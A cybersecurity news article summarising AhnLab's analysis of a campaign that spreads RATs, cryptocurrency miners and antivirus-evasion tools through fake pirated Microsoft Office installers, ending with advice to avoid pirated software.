AI DevwWrld CyberDSA Chatbot Summit Cyber Revolution Summit CYSEC Global Cyber Security & Cloud Expo World Series Digital Identity & Authentication Summit Asian Integrated Resort Expo Middle East Low Code No Code Summit TimeAI Summit

Distribution of malware via counterfeit copies of Microsoft Office

Malware campaign analysis using counterfeit installers of popular software

A malware campaign distributes pirated software, exploiting fake Microsoft Office installers. Download URLs point to legitimate services, making identification difficult. The malware includes RATs, cryptocurrency miners and antivirus evasion tools.

This pill is also available in Italian language

The AhnLab Security Intelligence Center (ASEC) has revealed a new malicious campaign targeting users looking for pirated versions of popular software such as Microsoft Office, Windows, and Hangul Word Processor. Hackers exploit fake Microsoft Office installers, tricking victims with a well-designed interface that allows them to choose between different versions, languages, and 32-bit or 64-bit architectures. Behind this facade, various types of malware are hidden, including RATs, cryptocurrency miners, droppers, proxies and antivirus evasion systems. The fake installer launches obfuscated .NET malware, which connects to messaging channels such as Telegram or Mastodon to obtain a genuine download URL.

Malware distribution methodology

The distributed URLs point to legitimate services such as Google Drive or GitHub, making it more difficult for antiviruses to identify them. The payloads are base64 encoded and contain PowerShell commands that unpack different malware strains using 7Zip. Among the components identified, there is a malware called "Updater", which exploits the Windows Task Scheduler to ensure the persistence of threats even after a system restart. This sophisticated technique allows attackers to maintain continuous access to the compromised system, making it difficult for victims to completely wipe their devices once infected.

Types of malware involved

ASEC research identified various types of malware installed via this campaign. Among these, Orcus RAT is a remote access Trojan that allows total control of the system, with keylogging functions, webcam access and other exfiltration capabilities. XMRig is a cryptocurrency miner that leverages system resources to mine Monero, suspending mining during heavy resource use to avoid suspicion. 3Proxy turns infected systems into proxy servers, allowing attackers to route malicious traffic. PureCrypter downloads and executes additional malicious payloads, ensuring continued infection. Finally, AntiAV disables security software, manipulating its configuration files to prevent it from working properly and leaving the system vulnerable.

Implications and advice for users

This strategy of infection through pirated software is not new but continues to be effective, as demonstrated by the spread of the STOP ransomware, currently one of the most active ransomware operations targeting consumer users. Pirated programs lack digital signatures and users tend to ignore security warnings since they know they are using unofficial material. This behavior, combined with any easily overlooked graphic discrepancies, makes pirated files an ideal vector for malware infections. You are strongly advised to avoid downloading and installing pirated software and always use authentic and updated versions of programs to avoid security compromises.

Follow us on Threads for more pills like this

06/02/2024 08:31

Marco Verro

Last pills

Italy's success in cybersecurityHow Italy achieved excellence in global cybersecurity: strategies, collaborations, and international successes

IntelBroker alleged breach of Deloitte systemsServer exposed: how Deloitte's security may have been compromised by a cyber attack

Vo1d infections on Android TV boxes: how to protect your devicesLearn the essential measures to protect your Android TV boxes from the dreaded Vo1d malware and keep your devices safe from cyber threats

Hacker attack in Lebanon: Hezbollah under fireTechnological shock and injuries: cyber warfare hits Hezbollah in Lebanon